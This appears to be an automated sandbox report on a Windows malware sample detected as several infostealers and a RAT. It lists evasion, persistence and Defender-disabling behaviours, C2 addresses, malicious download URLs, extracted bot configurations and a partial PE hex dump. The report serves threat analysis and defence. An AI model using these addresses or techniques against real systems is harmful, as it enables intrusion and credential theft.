Windows Analysis Report
WlCIinu0yp.exe

Overview

General Information

Sample name:	WlCIinu0yp.exe renamed because original name is a hash value
Original sample name:	28d853922cf07f58ea8f4a81492120ae.exe
Analysis ID:	1434501
MD5:	28d853922cf07f58ea8f4a81492120ae
SHA1:	e957c503b201179bc7901256bf37ff292705e805
SHA256:	e62b73e7f0b73dcdcf303dcd3f587a54a684d0ab4c0dd1e90b3a8b39502a9a38
Tags:	exe
Infos:

Detection

LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, Socks5Systemz, Vidar, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Disable power options

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected RisePro Stealer

Yara detected Socks5Systemz

Yara detected Vidar stealer

Yara detected zgRAT

Adds extensions / path to Windows Defender exclusion list (Registry)

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Connects to many ports of the same IP (likely port scanning)

Creates HTML files with .exe extension (expired dropper behavior)

Creates multiple autostart registry keys

Disable Windows Defender real time protection (registry)

Disables Windows Defender (deletes autostart)

Drops PE files to the document folder of the user

Exclude list of file types from scheduled, custom, and real-time scanning

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Found stalling execution ending in API Sleep call

Hides threads from debuggers

Injects a PE file into a foreign processes

Installs new ROOT certificates

Machine Learning detection for dropped file

Modifies Group Policy settings

Modifies power options to not sleep / hibernate

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

PE file contains section with special chars

PE file has nameless sections

Performs DNS queries to domains with low reputation

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses process hollowing technique

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses powercfg.exe to modify the power settings

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops certificate files (DER)

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Startup Folder File Write

Sigma detected: Windows Defender Exclusions Added - Registry

Stores files to the Windows start menu directory

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: WlCIinu0yp.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://193.233.132.139/	Avira URL Cloud: Label: phishing
Source: https://monoblocked.com/525403/setup.exe	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cad54ba5b01423b1af8ec10ab5719d97[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1357328
Source: C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe	Avira: detection malicious, Label: TR/Miner.mdqej
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\123p[1].exe	Avira: detection malicious, Label: TR/Miner.mdqej
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Avira: detection malicious, Label: HEUR/AGEN.1306558
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Avira: detection malicious, Label: TR/Redcap.nszjr
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\7725eaa6592c80f8124e769b4e8a07f7[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1357328
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\060[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1332570
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Avira: detection malicious, Label: HEUR/AGEN.1306558
Source: C:\Users\user\AppData\Local\ExtreamFanV5\ExtreamFanV5.exe	Avira: detection malicious, Label: TR/Redcap.nszjr
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\fiona[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1306558

Found malware configuration

Source: 00000015.00000002.1951214705.0000000000E29000.00000004.00000001.01000000.00000012.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199680449169"], "Botnet": "03cea2609023d13f145ac6c5dc897112", "Version": "9.3"}
Source: 19.2.wDFs1SzoVQiT2__nQmbIm6Rg.exe.317000.1.raw.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["5.42.65.96:28380"], "Bot Id": "LogsDiller Cloud (TG: @logsdillabot)", "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}
Source: softjenimmp3converter.exe.3992.49.memstrmin	Malware Configuration Extractor: Socks5Systemz {"C2 list": ["cskuxgp.net"]}

Multi AV Scanner detection for domain / URL

Source: monoblocked.com	Virustotal: Detection: 15%	Perma Link
Source: pofix.red	Virustotal: Detection: 16%	Perma Link
Source: triedchicken.net	Virustotal: Detection: 20%	Perma Link
Source: carthewasher.net	Virustotal: Detection: 15%	Perma Link
Source: iplis.ru	Virustotal: Detection: 10%	Perma Link
Source: http://193.233.132.139/	Virustotal: Detection: 20%	Perma Link
Source: https://monoblocked.com/	Virustotal: Detection: 15%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\DDEReadline 2.22.66\DDEReadline 2.22.66.exe	ReversingLabs: Detection: 36%
Source: C:\ProgramData\MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV202.exe	ReversingLabs: Detection: 70%
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	ReversingLabs: Detection: 95%
Source: C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV202.exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\ExtreamFanV5\ExtreamFanV5.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\123p[1].exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Retailer_prog[1].exe	ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma2804[1].exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\timeSync[1].exe	ReversingLabs: Detection: 40%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\Default12_big[1].exe	ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\lumma2804[1].exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Space1.9_big[1].exe	ReversingLabs: Detection: 24%
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-1CATB.tmp	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\libeay32.dll (copy)	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\PowerExpertNT\PowerExpertNT.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\heidiLgVUNbWj4Aw0\6JeTTVCBi2pYO9g7t24p.exe	ReversingLabs: Detection: 70%

Multi AV Scanner detection for submitted file

Source: WlCIinu0yp.exe	ReversingLabs: Detection: 57%
Source: WlCIinu0yp.exe	Virustotal: Detection: 66%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cad54ba5b01423b1af8ec10ab5719d97[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\123p[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV202.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\timeSync[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\DDEReadline 2.22.66\DDEReadline 2.22.66.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\setup[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\aeb24096[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\7725eaa6592c80f8124e769b4e8a07f7[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma2804[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV202.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\ExtreamFanV5\ExtreamFanV5.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\lumma2804[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\fiona[1].exe	Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe

Unpacked PE file: 46.2.softjenimmp3converter.exe.400000.0.unpack

Source: unknown	HTTPS traffic detected: 172.67.75.163:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.111:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.144.181:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.119:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.121:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.55.189:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.182:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.130.41.108:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 37.221.125.202:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 93.186.225.194:443 -> 192.168.2.4:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 93.186.225.194:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.142.206.0:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.142.206.2:443 -> 192.168.2.4:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.142.206.1:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.32:443 -> 192.168.2.4:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.113:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.32:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.32:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.104.85.160:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49900 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49902 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49935 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49937 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49938 version: TLS 1.2

Source:	Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\x64\Release\XBundlerTlsHelper.pdb source: WlCIinu0yp.exe
Source:	Binary string: C:\Users\weckb\source\repos\Hider\Hider\obj\x64\Release\Hider.pdb source: ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000000.1909451075.000001C579D82000.00000002.00000001.01000000.00000007.sdmp, ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000002.2953053052.000001C57C160000.00000002.00000001.00040000.00000007.sdmp
Source:	Binary string: D:\Work\_\QtAV\QtAV-Desktop_Qt_5_15_1_MSVC2019_64bit\lib_win_x86_64\QtAVWidgets1.pdb++ source: is-280SC.tmp.25.dr
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2746107478.0000000068E44000.00000002.00000001.01000000.00000021.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2703885312.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2417687969.0000000004501000.00000004.00000800.00020000.00000000.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2417687969.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2547368675.00000000005A4000.00000040.00000001.01000000.00000006.sdmp, H14SDf_AWcPvvQK5Xx97sISX.exe, 00000010.00000002.3127380532.00000000005EB000.00000040.00000001.01000000.00000011.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2538173466.000000000059E000.00000040.00000001.01000000.00000014.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: WlCIinu0yp.exe
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Xml.pdb source: is-OFQC1.tmp.25.dr
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: WlCIinu0yp.exe
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Users\kkelsch\Documents\PushNotifications\PushSharp\PushSharp-master\PushSharp.Core\obj\Debug\PushSharp.Core.pdb source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2417687969.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2703885312.0000000005DCA000.00000004.08000000.00040000.00000000.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2417687969.0000000004C88000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\Program Files\Microsoft Enterprise Library January 2006\src\Data\obj\Debug\Microsoft.Practices.EnterpriseLibrary.Data.pdb source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000C62000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\Work\_\QtAV\QtAV-Desktop_Qt_5_15_1_MSVC2019_64bit\lib_win_x86_64\QtAVWidgets1.pdb source: is-280SC.tmp.25.dr

Change of critical system settings

Adds extensions / path to Windows Defender exclusion list (Registry)

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions Exclusions_Extensions			Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions exe			Jump to behavior

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004DB1CB FindFirstFileExW,GetLastError,		7_2_004DB1CB
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0040B300 FindFirstFileA,FindNextFileA,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error,		7_2_0040B300

Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2049837 ET TROJAN Suspected PrivateLoader Activity (POST) 192.168.2.4:49730 -> 5.42.66.10:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: cskuxgp.net
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199680449169
Source: Malware configuration extractor	URLs: 5.42.65.96:28380

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 147.45.47.93 ports 0,5,7,8,58709,9

Creates HTML files with .exe extension (expired dropper behavior)

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: PaYqxdT7Epov9iGUzAxGNwu7.exe.0.dr
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: b4GIFfxokws3p_peAzAPeg9D.exe.0.dr

Performs DNS queries to domains with low reputation

Source:

DNS query: f.123654987.xyz

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.4:49806 -> 5.42.66.10:50505
Source: global traffic	TCP traffic: 192.168.2.4:49808 -> 95.217.245.42:9000
Source: global traffic	TCP traffic: 192.168.2.4:49809 -> 147.45.47.93:58709
Source: global traffic	TCP traffic: 192.168.2.4:49810 -> 5.42.65.96:28380
Source: global traffic	TCP traffic: 192.168.2.4:49832 -> 193.233.132.253:50500

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 01 May 2024 06:40:20 GMTServer: Apache/2.4.52 (Ubuntu)Content-Description: File TransferContent-Disposition: attachment; filename=timeSync.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicContent-Length: 218112Content-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 c3 78 b2 a1 a2 16 e1 a1 a2 16 e1 a1 a2 16 e1 bf f0 83 e1 b0 a2 16 e1 bf f0 95 e1 c4 a2 16 e1 bf f0 92 e1 8b a2 16 e1 86 64 6d e1 a4 a2 16 e1 a1 a2 17 e1 ce a2 16 e1 bf f0 9c e1 a0 a2 16 e1 bf f0 82 e1 a0 a2 16 e1 bf f0 87 e1 a0 a2 16 e1 52 69 63 68 a1 a2 16 e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 18 b3 7e 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 a8 00 00 00 dc 6e 02 00 00 00 00 1f 18 00 00 00 10 00 00 00 c0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 6f 02 00 04 00 00 32 32 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec 9f 02 00 3c 00 00 00 00 90 6e 02 f8 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c3 a7 00 00 00 10 00 00 00 a8 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 e8 01 00 00 c0 00 00 00 ea 01 00 00 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 d3 6b 02 00 b0 02 00 00 28 00 00 00 96 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 94 00 00 00 90 6e 02 00 96 00 00 00 be 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
